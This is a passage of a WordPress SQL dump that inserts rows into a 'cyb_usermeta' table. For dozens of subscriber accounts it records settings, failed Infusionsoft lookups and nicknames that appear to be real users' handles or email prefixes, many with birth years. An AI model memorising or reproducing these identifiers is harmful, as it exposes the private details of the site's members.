(30179, 2313, 'description', ''),
(30180, 2313, 'rich_editing', 'true'),
(30181, 2313, 'comment_shortcuts', 'false'),
(30182, 2313, 'admin_color', 'fresh'),
(30183, 2313, 'use_ssl', '0'),
(30184, 2313, 'show_admin_bar_front', 'true'),
(30185, 2313, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30186, 2313, 'cyb_user_level', '0'),
(30187, 2313, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30188, 2313, 'default_password_nag', '1'),
(30189, 2314, 'nickname', 'shannonjeffries71998'),
(30190, 2314, 'first_name', ''),
(30191, 2314, 'last_name', ''),
(30192, 2314, 'description', ''),
(30193, 2314, 'rich_editing', 'true'),
(30194, 2314, 'comment_shortcuts', 'false'),
(30195, 2314, 'admin_color', 'fresh'),
(30196, 2314, 'use_ssl', '0'),
(30197, 2314, 'show_admin_bar_front', 'true'),
(30198, 2314, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30199, 2314, 'cyb_user_level', '0'),
(30200, 2314, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30201, 2314, 'default_password_nag', '1'),
(30202, 2315, 'nickname', 'deirdrecriss1980'),
(30203, 2315, 'first_name', ''),
(30204, 2315, 'last_name', ''),
(30205, 2315, 'description', ''),
(30206, 2315, 'rich_editing', 'true'),
(30207, 2315, 'comment_shortcuts', 'false'),
(30208, 2315, 'admin_color', 'fresh'),
(30209, 2315, 'use_ssl', '0'),
(30210, 2315, 'show_admin_bar_front', 'true'),
(30211, 2315, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30212, 2315, 'cyb_user_level', '0'),
(30213, 2315, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30214, 2315, 'default_password_nag', '1'),
(30215, 2316, 'nickname', 'sofia05302010'),
(30216, 2316, 'first_name', ''),
(30217, 2316, 'last_name', ''),
(30218, 2316, 'description', ''),
(30219, 2316, 'rich_editing', 'true'),
(30220, 2316, 'comment_shortcuts', 'false'),
(30221, 2316, 'admin_color', 'fresh'),
(30222, 2316, 'use_ssl', '0'),
(30223, 2316, 'show_admin_bar_front', 'true'),
(30224, 2316, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30225, 2316, 'cyb_user_level', '0'),
(30226, 2316, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30227, 2316, 'default_password_nag', '1'),
(30228, 2317, 'nickname', 'mjrc191964'),
(30229, 2317, 'first_name', ''),
(30230, 2317, 'last_name', ''),
(30231, 2317, 'description', ''),
(30232, 2317, 'rich_editing', 'true'),
(30233, 2317, 'comment_shortcuts', 'false'),
(30234, 2317, 'admin_color', 'fresh'),
(30235, 2317, 'use_ssl', '0'),
(30236, 2317, 'show_admin_bar_front', 'true');
INSERT INTO `cyb_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(30237, 2317, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30238, 2317, 'cyb_user_level', '0'),
(30239, 2317, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30240, 2317, 'default_password_nag', '1'),
(30241, 2318, 'nickname', 'preston_griffin1999'),
(30242, 2318, 'first_name', ''),
(30243, 2318, 'last_name', ''),
(30244, 2318, 'description', ''),
(30245, 2318, 'rich_editing', 'true'),
(30246, 2318, 'comment_shortcuts', 'false'),
(30247, 2318, 'admin_color', 'fresh'),
(30248, 2318, 'use_ssl', '0'),
(30249, 2318, 'show_admin_bar_front', 'true'),
(30250, 2318, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30251, 2318, 'cyb_user_level', '0'),
(30252, 2318, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30253, 2318, 'default_password_nag', '1'),
(30254, 2319, 'nickname', 'wlasna021982'),
(30255, 2319, 'first_name', ''),
(30256, 2319, 'last_name', ''),
(30257, 2319, 'description', ''),
(30258, 2319, 'rich_editing', 'true'),
(30259, 2319, 'comment_shortcuts', 'false'),
(30260, 2319, 'admin_color', 'fresh'),
(30261, 2319, 'use_ssl', '0'),
(30262, 2319, 'show_admin_bar_front', 'true'),
(30263, 2319, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30264, 2319, 'cyb_user_level', '0'),
(30265, 2319, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30266, 2319, 'default_password_nag', '1'),
(30267, 2320, 'nickname', 'mjr_brt1962'),
(30268, 2320, 'first_name', ''),
(30269, 2320, 'last_name', ''),
(30270, 2320, 'description', ''),
(30271, 2320, 'rich_editing', 'true'),
(30272, 2320, 'comment_shortcuts', 'false'),
(30273, 2320, 'admin_color', 'fresh'),
(30274, 2320, 'use_ssl', '0'),
(30275, 2320, 'show_admin_bar_front', 'true'),
(30276, 2320, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30277, 2320, 'cyb_user_level', '0'),
(30278, 2320, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30279, 2320, 'default_password_nag', '1'),
(30280, 2321, 'nickname', 'rajah186661998'),
(30281, 2321, 'first_name', ''),
(30282, 2321, 'last_name', ''),
(30283, 2321, 'description', ''),
(30284, 2321, 'rich_editing', 'true'),
(30285, 2321, 'comment_shortcuts', 'false'),
(30286, 2321, 'admin_color', 'fresh'),
(30287, 2321, 'use_ssl', '0'),
(30288, 2321, 'show_admin_bar_front', 'true'),
(30289, 2321, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30290, 2321, 'cyb_user_level', '0'),
(30291, 2321, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30292, 2321, 'default_password_nag', '1'),
(30293, 2322, 'nickname', 'sophiemorgan101962'),
(30294, 2322, 'first_name', ''),
(30295, 2322, 'last_name', ''),
(30296, 2322, 'description', ''),
(30297, 2322, 'rich_editing', 'true'),
(30298, 2322, 'comment_shortcuts', 'false'),
(30299, 2322, 'admin_color', 'fresh'),
(30300, 2322, 'use_ssl', '0'),
(30301, 2322, 'show_admin_bar_front', 'true'),
(30302, 2322, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30303, 2322, 'cyb_user_level', '0'),
(30304, 2322, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30305, 2322, 'default_password_nag', '1'),
(30306, 2323, 'nickname', 'maregueiro1991'),
(30307, 2323, 'first_name', ''),
(30308, 2323, 'last_name', ''),
(30309, 2323, 'description', ''),
(30310, 2323, 'rich_editing', 'true'),
(30311, 2323, 'comment_shortcuts', 'false'),
(30312, 2323, 'admin_color', 'fresh'),
(30313, 2323, 'use_ssl', '0'),
(30314, 2323, 'show_admin_bar_front', 'true'),
(30315, 2323, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30316, 2323, 'cyb_user_level', '0'),
(30317, 2323, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30318, 2323, 'default_password_nag', '1'),
(30319, 2324, 'nickname', 'justinedmonds71997'),
(30320, 2324, 'first_name', ''),
(30321, 2324, 'last_name', ''),
(30322, 2324, 'description', ''),
(30323, 2324, 'rich_editing', 'true'),
(30324, 2324, 'comment_shortcuts', 'false'),
(30325, 2324, 'admin_color', 'fresh'),
(30326, 2324, 'use_ssl', '0'),
(30327, 2324, 'show_admin_bar_front', 'true'),
(30328, 2324, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30329, 2324, 'cyb_user_level', '0'),
(30330, 2324, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30331, 2324, 'default_password_nag', '1'),
(30332, 2325, 'nickname', 'mtucker132005'),
(30333, 2325, 'first_name', ''),
(30334, 2325, 'last_name', ''),
(30335, 2325, 'description', ''),
(30336, 2325, 'rich_editing', 'true'),
(30337, 2325, 'comment_shortcuts', 'false'),
(30338, 2325, 'admin_color', 'fresh'),
(30339, 2325, 'use_ssl', '0'),
(30340, 2325, 'show_admin_bar_front', 'true'),
(30341, 2325, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30342, 2325, 'cyb_user_level', '0'),
(30343, 2325, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30344, 2325, 'default_password_nag', '1'),
(30345, 2326, 'nickname', 'wilcke1969'),
(30346, 2326, 'first_name', ''),
(30347, 2326, 'last_name', ''),
(30348, 2326, 'description', ''),
(30349, 2326, 'rich_editing', 'true'),
(30350, 2326, 'comment_shortcuts', 'false'),
(30351, 2326, 'admin_color', 'fresh'),
(30352, 2326, 'use_ssl', '0'),
(30353, 2326, 'show_admin_bar_front', 'true'),
(30354, 2326, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30355, 2326, 'cyb_user_level', '0'),
(30356, 2326, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30357, 2326, 'default_password_nag', '1'),
(30358, 2327, 'nickname', 'mastak1964'),
(30359, 2327, 'first_name', ''),
(30360, 2327, 'last_name', ''),
(30361, 2327, 'description', ''),
(30362, 2327, 'rich_editing', 'true'),
(30363, 2327, 'comment_shortcuts', 'false'),
(30364, 2327, 'admin_color', 'fresh'),
(30365, 2327, 'use_ssl', '0'),
(30366, 2327, 'show_admin_bar_front', 'true'),
(30367, 2327, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30368, 2327, 'cyb_user_level', '0'),
(30369, 2327, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30370, 2327, 'default_password_nag', '1'),
(30371, 2328, 'nickname', 'rmease131963'),
(30372, 2328, 'first_name', ''),
(30373, 2328, 'last_name', ''),
(30374, 2328, 'description', ''),
(30375, 2328, 'rich_editing', 'true'),
(30376, 2328, 'comment_shortcuts', 'false'),
(30377, 2328, 'admin_color', 'fresh'),
(30378, 2328, 'use_ssl', '0'),
(30379, 2328, 'show_admin_bar_front', 'true'),
(30380, 2328, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30381, 2328, 'cyb_user_level', '0'),
(30382, 2328, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30383, 2328, 'default_password_nag', '1'),
(30398, 2330, 'first_name', ''),
(30399, 2330, 'last_name', ''),
(30400, 2330, 'description', ''),
(30401, 2330, 'rich_editing', 'true'),
(30402, 2330, 'comment_shortcuts', 'false'),
(30403, 2330, 'admin_color', 'fresh'),
(30404, 2330, 'use_ssl', '0'),
(30405, 2330, 'show_admin_bar_front', 'true'),
(30406, 2330, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30407, 2330, 'cyb_user_level', '0'),
(30408, 2330, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30409, 2330, 'default_password_nag', '1'),
(30410, 2331, 'nickname', 'dconant1997'),
(30411, 2331, 'first_name', ''),
(30412, 2331, 'last_name', ''),
(30413, 2331, 'description', ''),
(30414, 2331, 'rich_editing', 'true'),
(30415, 2331, 'comment_shortcuts', 'false'),
(30416, 2331, 'admin_color', 'fresh'),
(30417, 2331, 'use_ssl', '0'),
(30418, 2331, 'show_admin_bar_front', 'true'),
(30419, 2331, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30420, 2331, 'cyb_user_level', '0'),
(30421, 2331, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30422, 2331, 'default_password_nag', '1'),
(30423, 2332, 'nickname', 'mblair381970'),
(30424, 2332, 'first_name', ''),
(30425, 2332, 'last_name', ''),
(30426, 2332, 'description', ''),
(30427, 2332, 'rich_editing', 'true'),
(30428, 2332, 'comment_shortcuts', 'false'),
(30429, 2332, 'admin_color', 'fresh'),
(30430, 2332, 'use_ssl', '0'),
(30431, 2332, 'show_admin_bar_front', 'true'),
(30432, 2332, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30433, 2332, 'cyb_user_level', '0'),
(30434, 2332, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30435, 2332, 'default_password_nag', '1'),
(30436, 2333, 'nickname', 'mazzocco.elisa1984'),
(30437, 2333, 'first_name', ''),
(30438, 2333, 'last_name', ''),
(30439, 2333, 'description', ''),
(30440, 2333, 'rich_editing', 'true'),
(30441, 2333, 'comment_shortcuts', 'false'),
(30442, 2333, 'admin_color', 'fresh'),
(30443, 2333, 'use_ssl', '0'),
(30444, 2333, 'show_admin_bar_front', 'true'),
(30445, 2333, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30446, 2333, 'cyb_user_level', '0'),
(30447, 2333, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30448, 2333, 'default_password_nag', '1'),
(30449, 2334, 'nickname', 'baluvelagala1982'),
(30450, 2334, 'first_name', ''),
(30451, 2334, 'last_name', ''),
(30452, 2334, 'description', ''),
(30453, 2334, 'rich_editing', 'true'),
(30454, 2334, 'comment_shortcuts', 'false'),
(30455, 2334, 'admin_color', 'fresh'),
(30456, 2334, 'use_ssl', '0'),
(30457, 2334, 'show_admin_bar_front', 'true'),
(30458, 2334, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30459, 2334, 'cyb_user_level', '0'),
(30460, 2334, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30461, 2334, 'default_password_nag', '1'),
(30462, 2335, 'nickname', 'ben1986'),
(30463, 2335, 'first_name', ''),
(30464, 2335, 'last_name', ''),
(30465, 2335, 'description', ''),
(30466, 2335, 'rich_editing', 'true'),
(30467, 2335, 'comment_shortcuts', 'false'),
(30468, 2335, 'admin_color', 'fresh'),
(30469, 2335, 'use_ssl', '0'),
(30470, 2335, 'show_admin_bar_front', 'true'),
(30471, 2335, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30472, 2335, 'cyb_user_level', '0'),
(30473, 2335, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30474, 2335, 'default_password_nag', '1'),
(30475, 2336, 'nickname', 'hercale1991'),
(30476, 2336, 'first_name', ''),
(30477, 2336, 'last_name', ''),
(30478, 2336, 'description', ''),
(30479, 2336, 'rich_editing', 'true'),
(30480, 2336, 'comment_shortcuts', 'false'),
(30481, 2336, 'admin_color', 'fresh'),
(30482, 2336, 'use_ssl', '0'),
(30483, 2336, 'show_admin_bar_front', 'true'),
(30484, 2336, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30485, 2336, 'cyb_user_level', '0'),
(30486, 2336, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30487, 2336, 'default_password_nag', '1'),
(30488, 2337, 'nickname', 'fortner.steve1994'),
(30489, 2337, 'first_name', ''),
(30490, 2337, 'last_name', ''),
(30491, 2337, 'description', ''),
(30492, 2337, 'rich_editing', 'true'),
(30493, 2337, 'comment_shortcuts', 'false'),
(30494, 2337, 'admin_color', 'fresh'),
(30495, 2337, 'use_ssl', '0'),
(30496, 2337, 'show_admin_bar_front', 'true'),
(30497, 2337, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30498, 2337, 'cyb_user_level', '0'),
(30499, 2337, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30500, 2337, 'default_password_nag', '1'),
(30501, 2338, 'nickname', 'oglasi1984'),
(30502, 2338, 'first_name', ''),
(30503, 2338, 'last_name', ''),
(30504, 2338, 'description', ''),
(30505, 2338, 'rich_editing', 'true'),
(30506, 2338, 'comment_shortcuts', 'false'),
(30507, 2338, 'admin_color', 'fresh'),
(30508, 2338, 'use_ssl', '0'),
(30509, 2338, 'show_admin_bar_front', 'true'),
(30510, 2338, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30511, 2338, 'cyb_user_level', '0'),
(30512, 2338, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30513, 2338, 'default_password_nag', '1'),
(30514, 2339, 'nickname', 'kjt10072005'),
(30515, 2339, 'first_name', ''),
(30516, 2339, 'last_name', ''),
(30517, 2339, 'description', ''),
(30518, 2339, 'rich_editing', 'true'),
(30519, 2339, 'comment_shortcuts', 'false'),
(30520, 2339, 'admin_color', 'fresh'),
(30521, 2339, 'use_ssl', '0'),
(30522, 2339, 'show_admin_bar_front', 'true'),
(30523, 2339, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30524, 2339, 'cyb_user_level', '0'),
(30525, 2339, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30526, 2339, 'default_password_nag', '1'),
(30527, 2340, 'nickname', 'flexmaster7772009'),
(30528, 2340, 'first_name', ''),
(30529, 2340, 'last_name', ''),
(30530, 2340, 'description', ''),
(30531, 2340, 'rich_editing', 'true'),
(30532, 2340, 'comment_shortcuts', 'false'),
(30533, 2340, 'admin_color', 'fresh'),
(30534, 2340, 'use_ssl', '0'),
(30535, 2340, 'show_admin_bar_front', 'true'),
(30536, 2340, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30537, 2340, 'cyb_user_level', '0'),
(30538, 2340, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30539, 2340, 'default_password_nag', '1'),
(30540, 2341, 'nickname', 'nicole.mwmproductions1977'),
(30541, 2341, 'first_name', ''),
(30542, 2341, 'last_name', ''),
(30543, 2341, 'description', ''),
(30544, 2341, 'rich_editing', 'true'),
(30545, 2341, 'comment_shortcuts', 'false'),
(30546, 2341, 'admin_color', 'fresh'),
(30547, 2341, 'use_ssl', '0'),
(30548, 2341, 'show_admin_bar_front', 'true'),
(30549, 2341, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30550, 2341, 'cyb_user_level', '0'),
(30551, 2341, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30552, 2341, 'default_password_nag', '1'),
(30553, 2342, 'nickname', 'internet1972'),
(30554, 2342, 'first_name', ''),
(30555, 2342, 'last_name', ''),
(30556, 2342, 'description', ''),
(30557, 2342, 'rich_editing', 'true'),
(30558, 2342, 'comment_shortcuts', 'false'),
(30559, 2342, 'admin_color', 'fresh'),
(30560, 2342, 'use_ssl', '0'),
(30561, 2342, 'show_admin_bar_front', 'true'),
(30562, 2342, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30563, 2342, 'cyb_user_level', '0'),
(30564, 2342, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30565, 2342, 'default_password_nag', '1'),
(30566, 2343, 'nickname', 'lisaahans1974'),
(30567, 2343, 'first_name', ''),
(30568, 2343, 'last_name', ''),
(30569, 2343, 'description', ''),
(30570, 2343, 'rich_editing', 'true'),
(30571, 2343, 'comment_shortcuts', 'false'),
(30572, 2343, 'admin_color', 'fresh'),
(30573, 2343, 'use_ssl', '0'),
(30574, 2343, 'show_admin_bar_front', 'true'),
(30575, 2343, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30576, 2343, 'cyb_user_level', '0'),
(30577, 2343, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30578, 2343, 'default_password_nag', '1'),
(30579, 2344, 'nickname', 'cssims10221998'),
(30580, 2344, 'first_name', ''),
(30581, 2344, 'last_name', ''),
(30582, 2344, 'description', ''),
(30583, 2344, 'rich_editing', 'true'),
(30584, 2344, 'comment_shortcuts', 'false'),
(30585, 2344, 'admin_color', 'fresh'),
(30586, 2344, 'use_ssl', '0'),
(30587, 2344, 'show_admin_bar_front', 'true'),
(30588, 2344, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30589, 2344, 'cyb_user_level', '0'),
(30590, 2344, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30591, 2344, 'default_password_nag', '1'),
(30592, 2345, 'nickname', 'stephencooper2006'),
(30593, 2345, 'first_name', ''),
(30594, 2345, 'last_name', ''),
(30595, 2345, 'description', ''),
(30596, 2345, 'rich_editing', 'true'),
(30597, 2345, 'comment_shortcuts', 'false'),
(30598, 2345, 'admin_color', 'fresh'),
(30599, 2345, 'use_ssl', '0'),
(30600, 2345, 'show_admin_bar_front', 'true'),
(30601, 2345, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30602, 2345, 'cyb_user_level', '0'),
(30603, 2345, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30604, 2345, 'default_password_nag', '1'),
(30605, 2346, 'nickname', 'aineknee1991'),
(30606, 2346, 'first_name', ''),
(30607, 2346, 'last_name', ''),
(30608, 2346, 'description', ''),
(30609, 2346, 'rich_editing', 'true'),
(30610, 2346, 'comment_shortcuts', 'false'),
(30611, 2346, 'admin_color', 'fresh'),
(30612, 2346, 'use_ssl', '0'),
(30613, 2346, 'show_admin_bar_front', 'true'),
(30614, 2346, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30615, 2346, 'cyb_user_level', '0'),
(30616, 2346, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30617, 2346, 'default_password_nag', '1'),
(30618, 2347, 'nickname', 'jasteinmetz1977'),
(30619, 2347, 'first_name', ''),
(30620, 2347, 'last_name', ''),
(30621, 2347, 'description', ''),
(30622, 2347, 'rich_editing', 'true'),
(30623, 2347, 'comment_shortcuts', 'false'),
(30624, 2347, 'admin_color', 'fresh'),
(30625, 2347, 'use_ssl', '0'),
(30626, 2347, 'show_admin_bar_front', 'true'),
(30627, 2347, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30628, 2347, 'cyb_user_level', '0'),
(30629, 2347, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30630, 2347, 'default_password_nag', '1'),
(30631, 2348, 'nickname', 'maureen_walthall1965'),
(30632, 2348, 'first_name', ''),
(30633, 2348, 'last_name', ''),
(30634, 2348, 'description', ''),
(30635, 2348, 'rich_editing', 'true'),
(30636, 2348, 'comment_shortcuts', 'false'),
(30637, 2348, 'admin_color', 'fresh'),
(30638, 2348, 'use_ssl', '0'),
(30639, 2348, 'show_admin_bar_front', 'true'),
(30640, 2348, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30641, 2348, 'cyb_user_level', '0'),
(30642, 2348, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30643, 2348, 'default_password_nag', '1'),
(30644, 2349, 'nickname', 'ashfhan1997'),
(30645, 2349, 'first_name', ''),
(30646, 2349, 'last_name', ''),
(30647, 2349, 'description', ''),
(30648, 2349, 'rich_editing', 'true'),
(30649, 2349, 'comment_shortcuts', 'false'),
(30650, 2349, 'admin_color', 'fresh'),
(30651, 2349, 'use_ssl', '0'),
(30652, 2349, 'show_admin_bar_front', 'true'),
(30653, 2349, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30654, 2349, 'cyb_user_level', '0'),
(30655, 2349, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30656, 2349, 'default_password_nag', '1'),
(30657, 2350, 'nickname', 'redakcija2001'),
(30658, 2350, 'first_name', ''),
(30659, 2350, 'last_name', ''),
(30660, 2350, 'description', ''),
(30661, 2350, 'rich_editing', 'true'),
(30662, 2350, 'comment_shortcuts', 'false'),
(30663, 2350, 'admin_color', 'fresh'),
(30664, 2350, 'use_ssl', '0'),
(30665, 2350, 'show_admin_bar_front', 'true'),
(30666, 2350, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30667, 2350, 'cyb_user_level', '0'),
(30668, 2350, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(30669, 2350, 'default_password_nag', '1'),
(30670, 2351, 'nickname', 'jlevinson46561978'),
(30671, 2351, 'first_name', ''),
(30672, 2351, 'last_name', ''),
(30673, 2351, 'description', ''),
(30674, 2351, 'rich_editing', 'true'),
(30675, 2351, 'comment_shortcuts', 'false'),
(30676, 2351, 'admin_color', 'fresh'),
(30677, 2351, 'use_ssl', '0'),
(30678, 2351, 'show_admin_bar_front', 'true'),
(30679, 2351, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(30680, 2351, 'cyb_user_level', '0'),
(30681, 2351, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
